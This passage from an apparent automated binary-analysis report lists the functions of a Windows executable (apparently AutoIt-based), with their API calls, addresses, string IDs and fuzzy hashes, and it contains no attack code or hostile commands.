                        • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                        • __itow.LIBCMT ref: 00469A97
                        Similarity
                        • API ID: MessageSend$__itow
                        • String ID:
                        • API String ID: 3379773720-0
                        APIs
                        • GetWindowRect.USER32(?,?), ref: 00449A4A
                        • ScreenToClient.USER32(?,?), ref: 00449A80
                        • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                        Similarity
                        • API ID: Window$ClientMoveRectScreen
                        • String ID:
                        • API String ID: 3880355969-0
                        APIs
                        Similarity
                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                        • String ID:
                        • API String ID: 2782032738-0
                        APIs
                        • ClientToScreen.USER32(00000000,?), ref: 0044169A
                        • GetWindowRect.USER32(?,?), ref: 00441722
                        • PtInRect.USER32(?,?,?), ref: 00441734
                        • MessageBeep.USER32(00000000), ref: 004417AD
                        Similarity
                        • API ID: Rect$BeepClientMessageScreenWindow
                        • String ID:
                        • API String ID: 1352109105-0
                        APIs
                        • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                        • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                        • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                        • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                        Similarity
                        • API ID: CreateHardLink$DeleteErrorFileLast
                        • String ID:
                        • API String ID: 3321077145-0
                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                        • __isleadbyte_l.LIBCMT ref: 004208A6
                        • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                        • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                        Similarity
                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                        • String ID:
                        • API String ID: 3058430110-0
                        APIs
                        • GetParent.USER32(?), ref: 004503C8
                        • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                        • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                        • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                        Similarity
                        • API ID: Proc$Parent
                        • String ID:
                        • API String ID: 2351499541-0
                        APIs
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                        • TranslateMessage.USER32(?), ref: 00442B01
                        • DispatchMessageW.USER32(?), ref: 00442B0B
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                        Similarity
                        • API ID: Message$Peek$DispatchTranslate
                        • String ID:
                        • API String ID: 1795658109-0
                        APIs
                        • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                          • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                          • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                          • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                        • GetCaretPos.USER32(?), ref: 004743B2
                        • ClientToScreen.USER32(00000000,?), ref: 004743E8
                        • GetForegroundWindow.USER32 ref: 004743EE
                        Similarity
                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                        • String ID:
                        • API String ID: 2759813231-0
                        APIs
                          • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                        • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                        • _wcslen.LIBCMT ref: 00449519
                        • _wcslen.LIBCMT ref: 00449526
                        Similarity
                        • API ID: MessageSend_wcslen$_wcspbrk
                        • String ID:
                        • API String ID: 2886238975-0
                        • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                        • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                        • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                        • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                        APIs
                        Similarity
                        • API ID: __setmode$DebugOutputString_fprintf
                        • String ID:
                        • API String ID: 1792727568-0
                        • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                        • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                        • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                        • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                        APIs
                          • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                        • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                        Similarity
                        • API ID: Window$Long$AttributesLayered
                        • String ID:
                        • API String ID: 2169480361-0
                        • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                        • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                        • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                        • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                        APIs
                          • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                          • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                          • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                        • lstrlenW.KERNEL32(?), ref: 00434CF6
                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                        • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                        • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                        Strings
                        Similarity
                        • API ID: lstrcmpilstrcpylstrlen$_malloc
                        • String ID: cdecl
                        • API String ID: 3850814276-3896280584
                        • Opcode ID: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                        • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                        • Opcode Fuzzy Hash: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                        • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                        APIs
                          • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                        • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                        • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                        • _memmove.LIBCMT ref: 0046D475
                        • inet_ntoa.WSOCK32(?), ref: 0046D481
                        Similarity
                        • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                        • String ID:
                        • API String ID: 2502553879-0
                        • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                        • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                        • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                        • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                        APIs
                        • SendMessageW.USER32 ref: 00448C69
                        • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                        • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                        • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                        Similarity
                        • API ID: MessageSend$LongWindow
                        • String ID:
                        • API String ID: 312131281-0
                        • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                        • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                        • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                        • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                        APIs
                        • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                        • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                        • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                        • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                        Similarity
                        • API ID: ErrorLastacceptselect
                        • String ID:
                        • API String ID: 385091864-0
                        • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                        • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                        • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                        • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                        APIs
                        • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                        Similarity
                        • API ID: MessageSend
                        • String ID:
                        • API String ID: 3850602802-0
                        • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                        • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                        • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                        • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                        • GetStockObject.GDI32(00000011), ref: 00430258
                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                        • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                        Similarity
                        • API ID: Window$CreateMessageObjectSendShowStock
                        • String ID:
                        • API String ID: 1358664141-0
                        • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                        • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                        • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                        • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                        APIs
                        • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                        • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                        • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                        Similarity
                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                        • String ID:
                        • API String ID: 2880819207-0
                        • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                        • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                        • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                        • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                        APIs
                        • GetWindowRect.USER32(?,?), ref: 00430BA2
                        • ScreenToClient.USER32(?,?), ref: 00430BC1
                        • ScreenToClient.USER32(?,?), ref: 00430BE2
                        • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                        Similarity
                        • API ID: ClientRectScreen$InvalidateWindow
                        • String ID:
                        • API String ID: 357397906-0
                        • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                        • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                        • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                        • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                        APIs
                        • __wsplitpath.LIBCMT ref: 0043392E
                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                        • __wsplitpath.LIBCMT ref: 00433950
                        • __wcsicoll.LIBCMT ref: 00433974
                        • __wcsicoll.LIBCMT ref: 0043398A
                        Similarity
                        • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                        • String ID:
                        • API String ID: 1187119602-0
                        • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                        • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                        • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                        • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                        APIs
                        Similarity
                        • API ID: _wcslen$_malloc_wcscat_wcscpy
                        • String ID:
                        • API String ID: 1597257046-0
                        • Opcode ID: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                        • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                        • Opcode Fuzzy Hash: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                        • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                        APIs
                        • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                        • __malloc_crt.LIBCMT ref: 0041F5B6
                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                        Similarity
                        • API ID: EnvironmentStrings$Free__malloc_crt
                        • String ID:
                        • API String ID: 237123855-0
                        APIs
                        Similarity
                        • API ID: DeleteDestroyObject$IconWindow
                        • String ID:
                        • API String ID: 3349847261-0
                        APIs
                        • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                        • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                        Similarity
                        • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                        • String ID:
                        • API String ID: 2223660684-0
                        APIs
                          • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                          • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                          • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                        • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                        • LineTo.GDI32(?,?,?), ref: 00447326
                        • EndPath.GDI32(?), ref: 00447336
                        • StrokePath.GDI32(?), ref: 00447344
                        Similarity
                        • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                        • String ID:
                        • API String ID: 2783949968-0
                        APIs
                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                        • GetCurrentThreadId.KERNEL32 ref: 004364A3
                        • AttachThreadInput.USER32(00000000), ref: 004364AA
                        Similarity
                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                        • String ID:
                        • API String ID: 2710830443-0
                        APIs
                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                        • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                        • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                        • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                          • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                          • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                        Similarity
                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                        • String ID:
                        • API String ID: 146765662-0
                        APIs
                        • GetDesktopWindow.USER32 ref: 00472B63
                        • GetDC.USER32(00000000), ref: 00472B6C
                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                        • ReleaseDC.USER32(00000000,?), ref: 00472B99
                        Similarity
                        • API ID: CapsDesktopDeviceReleaseWindow
                        • String ID:
                        • API String ID: 2889604237-0
                        APIs
                        • GetDesktopWindow.USER32 ref: 00472BB2
                        • GetDC.USER32(00000000), ref: 00472BBB
                        • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                        • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                        Similarity
                        • API ID: CapsDesktopDeviceReleaseWindow
                        • String ID:
                        • API String ID: 2889604237-0
                        APIs
                        • __getptd_noexit.LIBCMT ref: 00415150
                          • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                          • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                          • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                          • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                          • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                        • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                        • __freeptd.LIBCMT ref: 0041516B
                        • ExitThread.KERNEL32 ref: 00415173
                        Similarity
                        • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                        • String ID:
                        • API String ID: 1454798553-0
                        APIs
                        Strings
                        Similarity
                        • API ID: _strncmp
                        • String ID: Q\E
                        • API String ID: 909875538-2189900498
                        APIs
                        • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                          • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                          • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                          • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                        Strings
                        Similarity
                        • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                        • String ID: AutoIt3GUI$Container
                        • API String ID: 2652923123-3941886329
                        APIs
                        Strings
                        Similarity
                        • API ID: _memmove_strncmp
                        • String ID: U$\
                        • API String ID: 2666721431-100911408
                        APIs
                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                        • __wcsnicmp.LIBCMT ref: 00467288
                        • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                        Strings
                        Similarity
                        • API ID: Connection__wcsnicmp_wcscpy_wcslen
                        • String ID: LPT
                        • API String ID: 3035604524-1350329615
                        APIs
                        Strings
                        Similarity
                        • API ID: _memmove
                        • String ID: \$h
                        • API String ID: 4104443479-677774858
                        APIs
                        Strings
                        Similarity
                        • API ID: _memcmp
                        • String ID: &
                        • API String ID: 2931989736-1010288
                        APIs
                        Strings
                        Similarity
                        • API ID: _memmove
                        • String ID: \
                        • API String ID: 4104443479-2967466578
                        • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                        • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                        • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                        • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                        APIs
                        • _wcslen.LIBCMT ref: 00466825
                        • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                        Strings
                        Similarity
                        • API ID: CrackInternet_wcslen
                        • String ID: |
                        • API String ID: 596671847-2343686810
                        • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                        • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                        • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                        • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                        APIs
                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                        Strings
                        Similarity
                        • API ID: MessageSend
                        • String ID: '
                        • API String ID: 3850602802-1997036262
                        • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                        • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                        • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                        • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                        APIs
                        • _strlen.LIBCMT ref: 0040F858
                          • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                          • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                        • _sprintf.LIBCMT ref: 0040F9AE
                        Strings
                        Similarity
                        • API ID: _memmove$_sprintf_strlen
                        • String ID: %02X
                        • API String ID: 1921645428-436463671
                        • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                        • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                        • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                        • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                        APIs
                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                        Strings
                        Similarity
                        • API ID: MessageSend
                        • String ID: Combobox
                        • API String ID: 3850602802-2096851135
                        • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                        • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                        • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                        • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                        APIs
                        • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                        Strings
                        Similarity
                        • API ID: LengthMessageSendTextWindow
                        • String ID: edit
                        • API String ID: 2978978980-2167791130
                        • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                        • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                        • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                        • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                        APIs
                        • Sleep.KERNEL32(00000000), ref: 00476CB0
                        • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                        Strings
                        Similarity
                        • API ID: GlobalMemorySleepStatus
                        • String ID: @
                        • API String ID: 2783356886-2766056989
                        • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                        • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                        • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                        • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                        APIs
                        Strings
                        Similarity
                        • API ID: htonsinet_addr
                        • String ID: 255.255.255.255
                        • API String ID: 3832099526-2422070025
                        • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                        • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                        • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                        • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                        APIs
                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                        Strings
                        Similarity
                        • API ID: InternetOpen
                        • String ID: <local>
                        • API String ID: 2038078732-4266983199
                        • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                        • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                        • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                        • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                        APIs
                        Strings
                        Similarity
                        • API ID: __fread_nolock_memmove
                        • String ID: EA06
                        • API String ID: 1988441806-3962188686
                        • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                        • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                        • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                        • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                        APIs
                        Strings
                        Similarity
                        • API ID: _memmove
                        • String ID: u,D
                        • API String ID: 4104443479-3858472334
                        • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                        • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                        • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                        • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                        APIs
                        • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                        • wsprintfW.USER32 ref: 0045612A
                        Strings
                        Similarity
                        • API ID: MessageSend_mallocwsprintf
                        • String ID: %d/%02d/%02d
                        • API String ID: 1262938277-328681919
                        • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                        • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                        • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                        • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                        APIs
                        • InternetCloseHandle.WININET(?), ref: 00442663
                        • InternetCloseHandle.WININET ref: 00442668
                          • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                        Strings
                        Similarity
                        • API ID: CloseHandleInternet$ObjectSingleWait
                        • String ID: aeB
                        • API String ID: 857135153-906807131
                        • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                        • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
